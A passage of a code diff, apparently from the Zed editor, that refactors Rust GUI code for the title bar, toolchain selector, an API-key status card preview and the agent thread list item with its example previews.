- if worktree_path == *repo_path || worktree_path.starts_with(repo_path.as_ref()) {
- return Some(repo.clone());
- }
- }
-
- None
+ git_store
+ .repositories()
+ .values()
+ .filter(|repo| {
+ let repo_path = &repo.read(cx).work_directory_abs_path;
+ worktree_path == *repo_path || worktree_path.starts_with(repo_path.as_ref())
+ })
+ .max_by_key(|repo| repo.read(cx).work_directory_abs_path.as_os_str().len())
+ .cloned()
}
fn render_remote_project_connection(&self, cx: &mut Context<Self>) -> Option<AnyElement> {
@@ -607,10 +640,11 @@ impl TitleBar {
.style(ButtonStyle::Tinted(TintColor::Warning))
.label_size(LabelSize::Small)
.color(Color::Warning)
- .icon(IconName::Warning)
- .icon_color(Color::Warning)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Warning)
+ .size(IconSize::Small)
+ .color(Color::Warning),
+ )
.tooltip(|_, cx| {
Tooltip::with_meta(
"You're in Restricted Mode",
@@ -686,53 +720,14 @@ impl TitleBar {
)
}
- fn render_workspace_sidebar_toggle(
+ fn render_project_name(
&self,
- _window: &mut Window,
- cx: &mut Context<Self>,
- ) -> Option<AnyElement> {
- if !cx.has_flag::<AgentV2FeatureFlag>() || DisableAiSettings::get_global(cx).disable_ai {
- return None;
- }
-
- let is_sidebar_open = self.platform_titlebar.read(cx).is_workspace_sidebar_open();
-
- if is_sidebar_open {
- return None;
- }
-
- let has_notifications = self.platform_titlebar.read(cx).sidebar_has_notifications();
-
- Some(
- IconButton::new("toggle-workspace-sidebar", IconName::WorkspaceNavClosed)
- .icon_size(IconSize::Small)
- .when(has_notifications, |button| {
- button
- .indicator(Indicator::dot().color(Color::Accent))
- .indicator_border_color(Some(cx.theme().colors().title_bar_background))
- })
- .tooltip(move |_, cx| {
- Tooltip::for_action("Open Threads Sidebar", &ToggleWorkspaceSidebar, cx)
- })
- .on_click(|_, window, cx| {
- window.dispatch_action(ToggleWorkspaceSidebar.boxed_clone(), cx);
- })
- .into_any_element(),
- )
- }
-
- pub fn render_project_name(
- &self,
- window: &mut Window,
+ name: Option<SharedString>,
+ _: &mut Window,
cx: &mut Context<Self>,
) -> impl IntoElement {
let workspace = self.workspace.clone();
- let name = self.effective_active_worktree(cx).map(|worktree| {
- let worktree = worktree.read(cx);
- SharedString::from(worktree.root_name().as_unix_str().to_string())
- });
-
let is_project_selected = name.is_some();
let display_name = if let Some(ref name) = name {
@@ -743,14 +738,16 @@ impl TitleBar {
let is_sidebar_open = self.platform_titlebar.read(cx).is_workspace_sidebar_open();
- if is_sidebar_open {
+ let is_threads_list_view_active = self
+ .multi_workspace
+ .as_ref()
+ .and_then(|mw| mw.upgrade())
+ .map(|mw| mw.read(cx).is_threads_list_view_active(cx))
+ .unwrap_or(false);
+
+ if is_sidebar_open && is_threads_list_view_active {
return self
- .render_project_name_with_sidebar_popover(
- window,
- display_name,
- is_project_selected,
- cx,
- )
+ .render_recent_projects_popover(display_name, is_project_selected, cx)
.into_any_element();
}
@@ -759,10 +756,24 @@ impl TitleBar {
.map(|w| w.read(cx).focus_handle(cx))
.unwrap_or_else(|| cx.focus_handle());
+ let sibling_workspace_ids: HashSet<WorkspaceId> = self
+ .multi_workspace
+ .as_ref()
+ .and_then(|mw| mw.upgrade())
+ .map(|mw| {
+ mw.read(cx)
+ .workspaces()
+ .iter()
+ .filter_map(|ws| ws.read(cx).database_id())
+ .collect()
+ })
+ .unwrap_or_default();
+
PopoverMenu::new("recent-projects-menu")
.menu(move |window, cx| {
Some(recent_projects::RecentProjects::popover(
workspace.clone(),
+ sibling_workspace_ids.clone(),
false,
focus_handle.clone(),
window,
@@ -773,9 +784,11 @@ impl TitleBar {
Button::new("project_name_trigger", display_name)
.label_size(LabelSize::Small)
.when(self.worktree_count(cx) > 1, |this| {
- this.icon(IconName::ChevronDown)
- .icon_color(Color::Muted)
- .icon_size(IconSize::XSmall)
+ this.end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
})
.selected_style(ButtonStyle::Tinted(TintColor::Accent))
.when(!is_project_selected, |s| s.color(Color::Muted)),
@@ -793,56 +806,79 @@ impl TitleBar {
.into_any_element()
}
- fn render_project_name_with_sidebar_popover(
+ fn render_recent_projects_popover(
&self,
- _window: &Window,
display_name: String,
is_project_selected: bool,
cx: &mut Context<Self>,
) -> impl IntoElement {
- let multi_workspace = self.multi_workspace.clone();
+ let workspace = self.workspace.clone();
+
+ let focus_handle = workspace
+ .upgrade()
+ .map(|w| w.read(cx).focus_handle(cx))
+ .unwrap_or_else(|| cx.focus_handle());
- let is_popover_deployed = multi_workspace
+ let sibling_workspace_ids: HashSet<WorkspaceId> = self
+ .multi_workspace
.as_ref()
.and_then(|mw| mw.upgrade())
- .map(|mw| mw.read(cx).is_recent_projects_popover_deployed(cx))
- .unwrap_or(false);
-
- Button::new("project_name_trigger", display_name)
- .label_size(LabelSize::Small)
- .when(self.worktree_count(cx) > 1, |this| {
- this.icon(IconName::ChevronDown)
- .icon_color(Color::Muted)
- .icon_size(IconSize::XSmall)
+ .map(|mw| {
+ mw.read(cx)
+ .workspaces()
+ .iter()
+ .filter_map(|ws| ws.read(cx).database_id())
+ .collect()
})
- .toggle_state(is_popover_deployed)
- .selected_style(ButtonStyle::Tinted(TintColor::Accent))
- .when(!is_project_selected, |s| s.color(Color::Muted))
- .tooltip(move |_window, cx| {
- Tooltip::for_action(
- "Recent Projects",
- &zed_actions::OpenRecent {
- create_new_window: false,
- },
+ .unwrap_or_default();
+
+ PopoverMenu::new("sidebar-title-recent-projects-menu")
+ .menu(move |window, cx| {
+ Some(recent_projects::RecentProjects::popover(
+ workspace.clone(),
+ sibling_workspace_ids.clone(),
+ false,
+ focus_handle.clone(),
+ window,
cx,
- )
- })
- .on_click(move |_, window, cx| {
- if let Some(mw) = multi_workspace.as_ref().and_then(|mw| mw.upgrade()) {
- mw.update(cx, |mw, cx| {
- mw.toggle_recent_projects_popover(window, cx);
- });
- }
+ ))
})
+ .trigger_with_tooltip(
+ Button::new("project_name_trigger", display_name)
+ .label_size(LabelSize::Small)
+ .when(self.worktree_count(cx) > 1, |this| {
+ this.end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
+ })
+ .selected_style(ButtonStyle::Tinted(TintColor::Accent))
+ .when(!is_project_selected, |s| s.color(Color::Muted)),
+ move |_window, cx| {
+ Tooltip::for_action(
+ "Recent Projects",
+ &zed_actions::OpenRecent {
+ create_new_window: false,
+ },
+ cx,
+ )
+ },
+ )
+ .anchor(gpui::Corner::TopLeft)
}
- pub fn render_project_branch(&self, cx: &mut Context<Self>) -> Option<impl IntoElement> {
- let effective_worktree = self.effective_active_worktree(cx)?;
- let repository = self.get_repository_for_worktree(&effective_worktree, cx)?;
+ fn render_project_branch(
+ &self,
+ repository: Entity<project::git_store::Repository>,
+ linked_worktree_name: Option<SharedString>,
+ cx: &mut Context<Self>,
+ ) -> Option<impl IntoElement> {
let workspace = self.workspace.upgrade()?;
let (branch_name, icon_info) = {
let repo = repository.read(cx);
+
let branch_name = repo
.branch
.as_ref()
@@ -875,8 +911,8 @@ impl TitleBar {
(branch_name, icon_info)
};
+ let branch_name = branch_name?;
let settings = TitleBarSettings::get_global(cx);
-
let effective_repository = Some(repository);
Some(
@@ -892,23 +928,42 @@ impl TitleBar {
))
})
.trigger_with_tooltip(
- Button::new("project_branch_trigger", branch_name?)
+ ButtonLike::new("project_branch_trigger")
.selected_style(ButtonStyle::Tinted(TintColor::Accent))
- .label_size(LabelSize::Small)
- .color(Color::Muted)
- .when(settings.show_branch_icon, |branch_button| {
- let (icon, icon_color) = icon_info;
- branch_button
- .icon(icon)
- .icon_position(IconPosition::Start)
- .icon_color(icon_color)
- .icon_size(IconSize::Indicator)
- }),
+ .child(
+ h_flex()
+ .gap_0p5()
+ .when(settings.show_branch_icon, |this| {
+ let (icon, icon_color) = icon_info;
+ this.child(
+ Icon::new(icon).size(IconSize::XSmall).color(icon_color),
+ )
+ })
+ .when_some(linked_worktree_name.as_ref(), |this, worktree_name| {
+ this.child(
+ Label::new(worktree_name)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ .child(
+ Label::new("/").size(LabelSize::Small).color(
+ Color::Custom(
+ cx.theme().colors().text_muted.opacity(0.4),
+ ),
+ ),
+ )
+ })
+ .child(
+ Label::new(branch_name)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ ),
move |_window, cx| {
Tooltip::with_meta(
- "Recent Branches",
+ "Git Switcher",
Some(&zed_actions::git::Branch),
- "Local branches only",
+ "Worktrees, Branches, and Stashes",
cx,
)
},
@@ -935,9 +990,23 @@ impl TitleBar {
}
fn active_call_changed(&mut self, cx: &mut Context<Self>) {
+ self.observe_diagnostics(cx);
cx.notify();
}
+ fn observe_diagnostics(&mut self, cx: &mut Context<Self>) {
+ let diagnostics = ActiveCall::global(cx)
+ .read(cx)
+ .room()
+ .and_then(|room| room.read(cx).diagnostics().cloned());
+
+ if let Some(diagnostics) = diagnostics {
+ self._diagnostics_subscription = Some(cx.observe(&diagnostics, |_, _, cx| cx.notify()));
+ } else {
+ self._diagnostics_subscription = None;
+ }
+ }
+
fn share_project(&mut self, cx: &mut Context<Self>) {
let active_call = ActiveCall::global(cx);
let project = self.project.clone();
@@ -1,3 +1,4 @@
+use gpui::WindowButtonLayout;
use settings::{RegisterSetting, Settings, SettingsContent};
#[derive(Copy, Clone, Debug, RegisterSetting)]
@@ -10,6 +11,7 @@ pub struct TitleBarSettings {
pub show_sign_in: bool,
pub show_user_menu: bool,
pub show_menus: bool,
+ pub button_layout: Option<WindowButtonLayout>,
}
impl Settings for TitleBarSettings {
@@ -24,6 +26,7 @@ impl Settings for TitleBarSettings {
show_sign_in: content.show_sign_in.unwrap(),
show_user_menu: content.show_user_menu.unwrap(),
show_menus: content.show_menus.unwrap(),
+ button_layout: content.button_layout.unwrap_or_default().into_layout(),
}
}
}
@@ -202,15 +202,15 @@ impl ActiveToolchain {
this.worktree_for_id(worktree_id, cx)
.map(|worktree| worktree.read(cx).abs_path())
})?;
- workspace::WORKSPACE_DB
- .set_toolchain(
- workspace_id,
- worktree_root_path,
- relative_path.clone(),
- toolchain.clone(),
- )
- .await
- .ok()?;
+ let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx)).ok()?;
+ db.set_toolchain(
+ workspace_id,
+ worktree_root_path,
+ relative_path.clone(),
+ toolchain.clone(),
+ )
+ .await
+ .ok()?;
project
.update(cx, |this, cx| {
this.activate_toolchain(
@@ -920,16 +920,16 @@ impl PickerDelegate for ToolchainSelectorDelegate {
let worktree_abs_path_root = self.worktree_abs_path_root.clone();
let path = self.relative_path.clone();
let relative_path = self.relative_path.clone();
+ let db = workspace::WorkspaceDb::global(cx);
cx.spawn_in(window, async move |_, cx| {
- workspace::WORKSPACE_DB
- .set_toolchain(
- workspace_id,
- worktree_abs_path_root,
- relative_path,
- toolchain.clone(),
- )
- .await
- .log_err();
+ db.set_toolchain(
+ workspace_id,
+ worktree_abs_path_root,
+ relative_path,
+ toolchain.clone(),
+ )
+ .await
+ .log_err();
workspace
.update(cx, |this, cx| {
this.project().update(cx, |this, cx| {
@@ -6,6 +6,7 @@ mod callout;
mod chip;
mod collab;
mod context_menu;
+mod count_badge;
mod data_table;
mod diff_stat;
mod disclosure;
@@ -49,6 +50,7 @@ pub use callout::*;
pub use chip::*;
pub use collab::*;
pub use context_menu::*;
+pub use count_badge::*;
pub use data_table::*;
pub use diff_stat::*;
pub use disclosure::*;
@@ -1,7 +1,7 @@
use crate::{Tooltip, prelude::*};
use gpui::{ClickEvent, IntoElement, ParentElement, SharedString};
-#[derive(IntoElement)]
+#[derive(IntoElement, RegisterComponent)]
pub struct ConfiguredApiCard {
label: SharedString,
button_label: Option<SharedString>,
@@ -52,6 +52,59 @@ impl ConfiguredApiCard {
}
}
+impl Component for ConfiguredApiCard {
+ fn scope() -> ComponentScope {
+ ComponentScope::Agent
+ }
+
+ fn preview(_window: &mut Window, cx: &mut App) -> Option<AnyElement> {
+ let container = || {
+ v_flex()
+ .w_72()
+ .p_2()
+ .gap_2()
+ .border_1()
+ .border_color(cx.theme().colors().border_variant)
+ .bg(cx.theme().colors().panel_background)
+ };
+
+ let examples = vec![
+ single_example(
+ "Default",
+ container()
+ .child(ConfiguredApiCard::new("API key is configured"))
+ .into_any_element(),
+ ),
+ single_example(
+ "Custom Button Label",
+ container()
+ .child(
+ ConfiguredApiCard::new("OpenAI API key configured")
+ .button_label("Remove Key"),
+ )
+ .into_any_element(),
+ ),
+ single_example(
+ "With Tooltip",
+ container()
+ .child(
+ ConfiguredApiCard::new("Anthropic API key configured")
+ .tooltip_label("Click to reset your API key"),
+ )
+ .into_any_element(),
+ ),
+ single_example(
+ "Disabled",
+ container()
+ .child(ConfiguredApiCard::new("API key is configured").disabled(true))
+ .into_any_element(),
+ ),
+ ];
+
+ Some(example_group(examples).into_any_element())
+ }
+}
+
impl RenderOnce for ConfiguredApiCard {
fn render(self, _: &mut Window, cx: &mut App) -> impl IntoElement {
let button_label = self.button_label.unwrap_or("Reset Key".into());
@@ -80,10 +133,11 @@ impl RenderOnce for ConfiguredApiCard {
elem.tab_index(tab_index)
})
.label_size(LabelSize::Small)
- .icon(IconName::Undo)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Undo)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.disabled(self.disabled)
.when_some(self.tooltip_label, |this, label| {
this.tooltip(Tooltip::text(label))
@@ -1 +0,0 @@
-
@@ -1,9 +1,13 @@
use crate::{
- DecoratedIcon, DiffStat, GradientFade, HighlightedLabel, IconDecoration, IconDecorationKind,
- SpinnerLabel, prelude::*,
+ CommonAnimationExt, DecoratedIcon, DiffStat, GradientFade, HighlightedLabel, IconDecoration,
+ IconDecorationKind, Tooltip, prelude::*,
};
-use gpui::{AnyView, ClickEvent, Hsla, SharedString};
+use gpui::{
+ Animation, AnimationExt, AnyView, ClickEvent, Hsla, MouseButton, SharedString,
+ pulsating_between,
+};
+use std::time::Duration;
#[derive(Clone, Copy, Debug, Default, PartialEq, Eq)]
pub enum AgentThreadStatus {
@@ -18,8 +22,13 @@ pub enum AgentThreadStatus {
pub struct ThreadItem {
id: ElementId,
icon: IconName,
+ icon_color: Option<Color>,
+ icon_visible: bool,
custom_icon_from_external_svg: Option<SharedString>,
title: SharedString,
+ title_label_color: Option<Color>,
+ title_generating: bool,
+ highlight_positions: Vec<usize>,
timestamp: SharedString,
notified: bool,
status: AgentThreadStatus,
@@ -29,7 +38,7 @@ pub struct ThreadItem {
added: Option<usize>,
removed: Option<usize>,
worktree: Option<SharedString>,
- highlight_positions: Vec<usize>,
+ worktree_full_path: Option<SharedString>,
worktree_highlight_positions: Vec<usize>,
on_click: Option<Box<dyn Fn(&ClickEvent, &mut Window, &mut App) + 'static>>,
on_hover: Box<dyn Fn(&bool, &mut Window, &mut App) + 'static>,
@@ -42,8 +51,13 @@ impl ThreadItem {
Self {
id: id.into(),
icon: IconName::ZedAgent,
+ icon_color: None,
+ icon_visible: true,
custom_icon_from_external_svg: None,
title: title.into(),
+ title_label_color: None,
+ title_generating: false,
+ highlight_positions: Vec::new(),
timestamp: "".into(),
notified: false,
status: AgentThreadStatus::default(),
@@ -53,7 +67,7 @@ impl ThreadItem {
added: None,
removed: None,
worktree: None,
- highlight_positions: Vec::new(),
+ worktree_full_path: None,
worktree_highlight_positions: Vec::new(),
on_click: None,
on_hover: Box::new(|_, _, _| {}),
@@ -72,6 +86,16 @@ impl ThreadItem {
self
}
+ pub fn icon_color(mut self, color: Color) -> Self {
+ self.icon_color = Some(color);
+ self
+ }
+
+ pub fn icon_visible(mut self, visible: bool) -> Self {
+ self.icon_visible = visible;
+ self
+ }
+
pub fn custom_icon_from_external_svg(mut self, svg: impl Into<SharedString>) -> Self {
self.custom_icon_from_external_svg = Some(svg.into());
self
@@ -87,6 +111,21 @@ impl ThreadItem {
self
}
+ pub fn title_generating(mut self, generating: bool) -> Self {
+ self.title_generating = generating;
+ self
+ }
+
+ pub fn title_label_color(mut self, color: Color) -> Self {
+ self.title_label_color = Some(color);
+ self
+ }
+
+ pub fn highlight_positions(mut self, positions: Vec<usize>) -> Self {
+ self.highlight_positions = positions;
+ self
+ }
+
pub fn selected(mut self, selected: bool) -> Self {
self.selected = selected;
self
@@ -112,8 +151,8 @@ impl ThreadItem {
self
}
- pub fn highlight_positions(mut self, positions: Vec<usize>) -> Self {
- self.highlight_positions = positions;
+ pub fn worktree_full_path(mut self, worktree_full_path: impl Into<SharedString>) -> Self {
+ self.worktree_full_path = Some(worktree_full_path.into());
self
}
@@ -154,26 +193,54 @@ impl ThreadItem {
impl RenderOnce for ThreadItem {
fn render(self, _: &mut Window, cx: &mut App) -> impl IntoElement {
let color = cx.theme().colors();
- // let dot_separator = || {
- // Label::new("•")
- // .size(LabelSize::Small)
- // .color(Color::Muted)
- // .alpha(0.5)
- // };
-
- let icon_container = || h_flex().size_4().flex_none().justify_center();
+ let base_bg = color
+ .title_bar_background
+ .blend(color.panel_background.opacity(0.2));
+
+ let base_bg = if self.selected {
+ color.element_active
+ } else {
+ base_bg
+ };
+
+ let hover_color = color
+ .element_active
+ .blend(color.element_background.opacity(0.2));
+
+ let gradient_overlay = GradientFade::new(base_bg, hover_color, hover_color)
+ .width(px(64.0))
+ .right(px(-10.0))
+ .gradient_stop(0.75)
+ .group_name("thread-item");
+
+ let dot_separator = || {
+ Label::new("•")
+ .size(LabelSize::Small)
+ .color(Color::Muted)
+ .alpha(0.5)
+ };
+
+ let icon_id = format!("icon-{}", self.id);
+ let icon_visible = self.icon_visible;
+ let icon_container = || {
+ h_flex()
+ .id(icon_id.clone())
+ .size_4()
+ .flex_none()
+ .justify_center()
+ .when(!icon_visible, |this| this.invisible())
+ };
+ let icon_color = self.icon_color.unwrap_or(Color::Muted);
let agent_icon = if let Some(custom_svg) = self.custom_icon_from_external_svg {
Icon::from_external_svg(custom_svg)
- .color(Color::Muted)
+ .color(icon_color)
.size(IconSize::Small)
} else {
- Icon::new(self.icon)
- .color(Color::Muted)
- .size(IconSize::Small)
+ Icon::new(self.icon).color(icon_color).size(IconSize::Small)
};
let decoration = |icon: IconDecorationKind, color: Hsla| {
- IconDecoration::new(icon, cx.theme().colors().surface_background, cx)
+ IconDecoration::new(icon, base_bg, cx)
.color(color)
.position(gpui::Point {
x: px(-2.),
@@ -181,71 +248,95 @@ impl RenderOnce for ThreadItem {
})
};
- let decoration = if self.status == AgentThreadStatus::WaitingForConfirmation {
- Some(decoration(
- IconDecorationKind::Triangle,
- cx.theme().status().warning,
- ))
- } else if self.status == AgentThreadStatus::Error {
- Some(decoration(IconDecorationKind::X, cx.theme().status().error))
+ let (decoration, icon_tooltip) = if self.status == AgentThreadStatus::Error {
+ (
+ Some(decoration(IconDecorationKind::X, cx.theme().status().error)),
+ Some("Thread has an Error"),
+ )
+ } else if self.status == AgentThreadStatus::WaitingForConfirmation {
+ (
+ Some(decoration(
+ IconDecorationKind::Triangle,
+ cx.theme().status().warning,
+ )),
+ Some("Thread is Waiting for Confirmation"),
+ )
} else if self.notified {
- Some(decoration(IconDecorationKind::Dot, color.text_accent))
+ (
+ Some(decoration(IconDecorationKind::Dot, color.text_accent)),
+ Some("Thread's Generation is Complete"),
+ )
} else {
- None
+ (None, None)
};
- let icon = if let Some(decoration) = decoration {
- icon_container().child(DecoratedIcon::new(agent_icon, Some(decoration)))
+ let icon = if self.status == AgentThreadStatus::Running {
+ icon_container()
+ .child(
+ Icon::new(IconName::LoadCircle)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ .with_rotate_animation(2),
+ )
+ .into_any_element()
+ } else if let Some(decoration) = decoration {
+ icon_container()
+ .child(DecoratedIcon::new(agent_icon, Some(decoration)))
+ .when_some(icon_tooltip, |icon, tooltip| {
+ icon.tooltip(Tooltip::text(tooltip))
+ })
+ .into_any_element()
} else {
- icon_container().child(agent_icon)
+ icon_container().child(agent_icon).into_any_element()
};
- let is_running = matches!(
- self.status,
- AgentThreadStatus::Running | AgentThreadStatus::WaitingForConfirmation
- );
- let running_or_action = is_running || (self.hovered && self.action_slot.is_some());
-
let title = self.title;
let highlight_positions = self.highlight_positions;
- let title_label = if highlight_positions.is_empty() {
- Label::new(title).into_any_element()
- } else {
- HighlightedLabel::new(title, highlight_positions).into_any_element()
- };
- let base_bg = if self.selected {
- color.element_active
+ let title_label = if self.title_generating {
+ Label::new(title)
+ .color(Color::Muted)
+ .with_animation(
+ "generating-title",
+ Animation::new(Duration::from_secs(2))
+ .repeat()
+ .with_easing(pulsating_between(0.4, 0.8)),
+ |label, delta| label.alpha(delta),
+ )
+ .into_any_element()
+ } else if highlight_positions.is_empty() {
+ Label::new(title)
+ .when_some(self.title_label_color, |label, color| label.color(color))
+ .into_any_element()
} else {
- color.panel_background
+ HighlightedLabel::new(title, highlight_positions)
+ .when_some(self.title_label_color, |label, color| label.color(color))
+ .into_any_element()
};
- let gradient_overlay =
- GradientFade::new(base_bg, color.element_hover, color.element_active)
- .width(px(32.0))
- .right(px(-10.0))
- .gradient_stop(0.8)
- .group_name("thread-item");
+ let has_diff_stats = self.added.is_some() || self.removed.is_some();
+ let diff_stat_id = self.id.clone();
+ let added_count = self.added.unwrap_or(0);
+ let removed_count = self.removed.unwrap_or(0);
+
+ let has_worktree = self.worktree.is_some();
+ let has_timestamp = !self.timestamp.is_empty();
+ let timestamp = self.timestamp;
v_flex()
.id(self.id.clone())
+ .cursor_pointer()
.group("thread-item")
.relative()
.overflow_hidden()
- .cursor_pointer()
.w_full()
- .map(|this| {
- if self.worktree.is_some() {
- this.p_2()
- } else {
- this.px_2().py_1()
- }
- })
+ .py_1()
+ .px_1p5()
.when(self.selected, |s| s.bg(color.element_active))
.border_1()
.border_color(gpui::transparent_black())
- .when(self.focused, |s| s.border_color(color.panel_focused_border))
- .hover(|s| s.bg(color.element_hover))
+ .when(self.focused, |s| s.border_color(color.border_focused))
+ .hover(|s| s.bg(hover_color))
.on_hover(self.on_hover)
.child(
h_flex()
@@ -264,68 +355,87 @@ impl RenderOnce for ThreadItem {
.when_some(self.tooltip, |this, tooltip| this.tooltip(tooltip)),
)
.child(gradient_overlay)
- .when(running_or_action, |this| {
- this.child(
- h_flex()
- .gap_1()
- .when(is_running, |this| {
- this.child(
- icon_container()
- .child(SpinnerLabel::new().color(Color::Accent)),
- )
- })
- .when(self.hovered, |this| {
- this.when_some(self.action_slot, |this, slot| this.child(slot))
- }),
- )
+ .when(self.hovered, |this| {
+ this.when_some(self.action_slot, |this, slot| {
+ let overlay = GradientFade::new(base_bg, hover_color, hover_color)
+ .width(px(64.0))
+ .right(px(6.))
+ .gradient_stop(0.75)
+ .group_name("thread-item");
+
+ this.child(
+ h_flex()
+ .relative()
+ .on_mouse_down(MouseButton::Left, |_, _, cx| {
+ cx.stop_propagation()
+ })
+ .child(overlay)
+ .child(slot),
+ )
+ })
}),
)
- .when_some(self.worktree, |this, worktree| {
- let worktree_highlight_positions = self.worktree_highlight_positions;
- let worktree_label = if worktree_highlight_positions.is_empty() {
- Label::new(worktree)
- .size(LabelSize::Small)
- .color(Color::Muted)
- .into_any_element()
- } else {
- HighlightedLabel::new(worktree, worktree_highlight_positions)
- .size(LabelSize::Small)
- .color(Color::Muted)
- .into_any_element()
- };
+ .when(has_worktree || has_diff_stats || has_timestamp, |this| {
+ let worktree_full_path = self.worktree_full_path.clone().unwrap_or_default();
+ let worktree_label = self.worktree.map(|worktree| {
+ let positions = self.worktree_highlight_positions;
+ if positions.is_empty() {
+ Label::new(worktree)
+ .size(LabelSize::Small)
+ .color(Color::Muted)
+ .into_any_element()
+ } else {
+ HighlightedLabel::new(worktree, positions)
+ .size(LabelSize::Small)
+ .color(Color::Muted)
+ .into_any_element()
+ }
+ });
this.child(
h_flex()
.min_w_0()
.gap_1p5()
.child(icon_container()) // Icon Spacing
- .child(worktree_label)
- // TODO: Uncomment the elements below when we're ready to expose this data
- // .child(dot_separator())
- // .child(
- // Label::new(self.timestamp)
- // .size(LabelSize::Small)
- // .color(Color::Muted),
- // )
- // .child(
- // Label::new("•")
- // .size(LabelSize::Small)
- // .color(Color::Muted)
- // .alpha(0.5),
- // )
- // .when(has_no_changes, |this| {
- // this.child(
- // Label::new("No Changes")
- // .size(LabelSize::Small)
- // .color(Color::Muted),
- // )
- // })
- .when(self.added.is_some() || self.removed.is_some(), |this| {
- this.child(DiffStat::new(
- self.id,
- self.added.unwrap_or(0),
- self.removed.unwrap_or(0),
- ))
+ .when_some(worktree_label, |this, label| {
+ this.child(
+ h_flex()
+ .id(format!("{}-worktree", self.id.clone()))
+ .gap_1()
+ .child(
+ Icon::new(IconName::GitWorktree)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
+ .child(label)
+ .tooltip(move |_, cx| {
+ Tooltip::with_meta(
+ "Thread Running in a Local Git Worktree",
+ None,
+ worktree_full_path.clone(),
+ cx,
+ )
+ }),
+ )
+ })
+ .when(has_worktree && (has_diff_stats || has_timestamp), |this| {
+ this.child(dot_separator())
+ })
+ .when(has_diff_stats, |this| {
+ this.child(
+ DiffStat::new(diff_stat_id, added_count, removed_count)
+ .tooltip("Unreviewed changes"),
+ )
+ })
+ .when(has_diff_stats && has_timestamp, |this| {
+ this.child(dot_separator())
+ })
+ .when(has_timestamp, |this| {
+ this.child(
+ Label::new(timestamp.clone())
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
}),
)
})
@@ -349,21 +459,31 @@ impl Component for ThreadItem {
let thread_item_examples = vec![
single_example(
- "Default",
+ "Default (minutes)",
container()
.child(
ThreadItem::new("ti-1", "Linking to the Agent Panel Depending on Settings")
.icon(IconName::AiOpenAi)
- .timestamp("1:33 AM"),
+ .timestamp("15m"),
)
.into_any_element(),
),
single_example(
- "Notified",
+ "Timestamp Only (hours)",
+ container()
+ .child(
+ ThreadItem::new("ti-1b", "Thread with just a timestamp")
+ .icon(IconName::AiClaude)
+ .timestamp("3h"),
+ )
+ .into_any_element(),
+ ),
+ single_example(
+ "Notified (weeks)",
container()
.child(
ThreadItem::new("ti-2", "Refine thread view scrolling behavior")
- .timestamp("12:12 AM")
+ .timestamp("1w")
.notified(true),
)
.into_any_element(),
@@ -373,7 +493,7 @@ impl Component for ThreadItem {
container()
.child(
ThreadItem::new("ti-2b", "Execute shell command in terminal")
- .timestamp("12:15 AM")
+ .timestamp("2h")
.status(AgentThreadStatus::WaitingForConfirmation),
)
.into_any_element(),
@@ -383,7 +503,7 @@ impl Component for ThreadItem {
container()
.child(
ThreadItem::new("ti-2c", "Failed to connect to language server")
- .timestamp("12:20 AM")
+ .timestamp("5h")
.status(AgentThreadStatus::Error),
)
.into_any_element(),
@@ -394,7 +514,7 @@ impl Component for ThreadItem {
.child(
ThreadItem::new("ti-3", "Add line numbers option to FileEditBlock")
.icon(IconName::AiClaude)
- .timestamp("7:30 PM")
+ .timestamp("23h")
.status(AgentThreadStatus::Running),
)
.into_any_element(),
@@ -405,30 +525,43 @@ impl Component for ThreadItem {
.child(
ThreadItem::new("ti-4", "Add line numbers option to FileEditBlock")
.icon(IconName::AiClaude)
- .timestamp("7:37 PM")
+ .timestamp("2w")
.worktree("link-agent-panel"),
)
.into_any_element(),
),
single_example(
- "With Changes",
+ "With Changes (months)",
container()
.child(
ThreadItem::new("ti-5", "Managing user and project settings interactions")
.icon(IconName::AiClaude)
- .timestamp("7:37 PM")
+ .timestamp("1mo")
.added(10)
.removed(3),
)
.into_any_element(),
),
+ single_example(
+ "Worktree + Changes + Timestamp",
+ container()
+ .child(
+ ThreadItem::new("ti-5b", "Full metadata example")
+ .icon(IconName::AiClaude)
+ .worktree("my-project")
+ .added(42)
+ .removed(17)
+ .timestamp("3w"),
+ )
+ .into_any_element(),
+ ),
single_example(
"Selected Item",
container()
.child(
ThreadItem::new("ti-6", "Refine textarea interaction behavior")
.icon(IconName::AiGemini)
- .timestamp("3:00 PM")
+ .timestamp("45m")
.selected(true),
)
.into_any_element(),
@@ -439,7 +572,7 @@ impl Component for ThreadItem {
.child(
ThreadItem::new("ti-7", "Implement keyboard navigation")
.icon(IconName::AiClaude)
- .timestamp("4:00 PM")
+ .timestamp("12h")
.focused(true),
)
.into_any_element(),
@@ -450,12 +583,51 @@ impl Component for ThreadItem {
.child(
ThreadItem::new("ti-8", "Active and keyboard-focused thread")
.icon(IconName::AiGemini)
- .timestamp("5:00 PM")
+ .timestamp("2mo")
.selected(true)
.focused(true),
)
.into_any_element(),
),
+ single_example(
+ "Hovered with Action Slot",
+ container()
+ .child(
+ ThreadItem::new("ti-9", "Hover to see action button")
+ .icon(IconName::AiClaude)
+ .timestamp("6h")
+ .hovered(true)
+ .action_slot(
+ IconButton::new("delete", IconName::Trash)
+ .icon_size(IconSize::Small)
+ .icon_color(Color::Muted),
+ ),
+ )
+ .into_any_element(),
+ ),
+ single_example(
+ "Search Highlight",
+ container()
+ .child(
+ ThreadItem::new("ti-10", "Implement keyboard navigation")
+ .icon(IconName::AiClaude)
+ .timestamp("4w")
+ .highlight_positions(vec![0, 1, 2, 3, 4, 5, 6, 7, 8, 9]),
+ )
+ .into_any_element(),
+ ),
+ single_example(
+ "Worktree Search Highlight",
+ container()
+ .child(
+ ThreadItem::new("ti-11", "Search in worktree name")
+ .icon(IconName::AiClaude)
+ .timestamp("3mo")
+ .worktree("my-project-name")
+ .worktree_highlight_positions(vec![3, 4, 5, 6, 7, 8, 9, 10, 11]),
+ )
